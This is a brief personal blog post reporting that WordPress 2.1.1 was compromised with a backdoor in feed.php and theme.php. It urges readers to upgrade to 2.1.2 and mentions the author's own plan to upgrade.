The official WordPress development blog is reporting that WordPress version 2.1.1 was compromised by a malicious hacker and anyone who downloaded that version in the past several days needs to upgrade immediately to version 2.1.2. Many more details at that link; I checked the two files they mentioned (feed.php and theme.php in the wp-includes folder) and I got one of the infected versions! If you do a “diff” and compare an infected file with one from the 2.1.2 download the infected line becomes obvious. The vulnerability, as far as I can tell, allows an attacker to easily execute any command on the system that’s allowed by the user PHP is running as by using a specially (but easily) crafted query string.
I’m still running 2.0.3 here as I write this, but I’m going to upgrade to 2.0.9 soon; I can’t run the 2.1.* series yet because I don’t have MySQL 4+ installed on my server yet.
Thanks to a post from security blogger Martin McKeay that was my first warning!